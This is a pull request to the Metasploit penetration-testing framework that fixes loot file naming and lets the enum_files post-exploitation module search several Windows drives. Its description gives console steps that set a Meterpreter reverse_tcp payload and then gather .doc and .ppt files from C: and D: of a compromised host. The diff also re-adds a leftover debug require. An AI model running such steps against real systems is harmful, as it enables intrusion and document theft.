### PR TITLE
Fix file suffix error, add multiple path download

### DIFF
--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -1,6 +1,5 @@
 # -*- coding: binary -*-
 module Msf
-require 'pry'
 
 ###
 #
@@ -388,7 +387,6 @@ module Auxiliary::Report
     if ! ::File.directory?(Msf::Config.loot_directory)
       FileUtils.mkdir_p(Msf::Config.loot_directory)
     end
-
     ext = 'bin'
     if filename
       parts = filename.to_s.split('.')
@@ -405,7 +403,7 @@ module Auxiliary::Report
     host = Msf::Util::Host.normalize_host(host)
 
     ws = (db ? myworkspace.name[0,16] : 'default')
-    name =
+    name = 
       Time.now.strftime("%Y%m%d%H%M%S") + "_" + ws + "_" +
       (host || 'unknown') + '_' + ltype[0,16] + '_' +
       Rex::Text.rand_text_numeric(6) + '.' + ext

--- a/lib/msf/core/auxiliary/report.rb
+++ b/lib/msf/core/auxiliary/report.rb
@@ -1,5 +1,6 @@
 # -*- coding: binary -*-
 module Msf
+require 'pry'
 
 ###
 #
@@ -416,9 +417,12 @@ module Auxiliary::Report
         FileUtils.mkdir_p(loot_dir)
       end
       if info.match(/[A-Za-z0-9]:\\/)
-        name = Time.now.strftime("%Y%m%d%H%M%S%L") + "_" + info.split(/\\/).join('_')
-        path = File.join(loot_dir,name)
+        name = Time.now.strftime("%Y%m%d%H%M%S%L") + "_"+ ws+ "_"+ info.split(/\\/).join('_')
+      else
+        name = Time.now.strftime("%Y%m%d%H%M%S%L") + "_"+ ws+ "_"+ ltype[0,16]+ "_"+ info+ ext
       end
+      name.gsub!(/[^a-z0-9\.\_]+/i, '')
+      path = File.join(loot_dir,name)
     else
       path = File.join(Msf::Config.loot_directory, name)
     end

--- a/modules/post/windows/gather/enum_files.rb
+++ b/modules/post/windows/gather/enum_files.rb
@@ -2,7 +2,6 @@
 # This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-
 require 'msf/core/auxiliary/report'
 
 class MetasploitModule < Msf::Post
@@ -83,7 +82,7 @@ class MetasploitModule < Msf::Post
 
   def run
     # When the location is set, make sure we have a valid path format
-    location = datastore['SEARCH_FROM'].split(",").each do |location|
+    datastore['SEARCH_FROM'].split(",").each do |location|
       location = location.strip
       if location and location !~ /^([a-z])\:[\\|\/].*/i
         print_error("Invalid SEARCH_FROM option: #{location}")
@@ -117,4 +116,5 @@ class MetasploitModule < Msf::Post
       print_status("Done at the #{location}!")
     end
   end
+
 end


### PR DESCRIPTION
Fix: File suffix error
Add: Search for multiple paths and download multiple files
issue number: [8743](https://github.com/rapid7/metasploit-framework/issues/8743)
@hktalent
```
set payloa windows/meterpreter/reverse_tcp
set lhost ***********
exploit
background
use post/windows/gather/enum_files
set search_from C:/, D:/
set file_globs *.doc, *.ppt
set session 1
run
```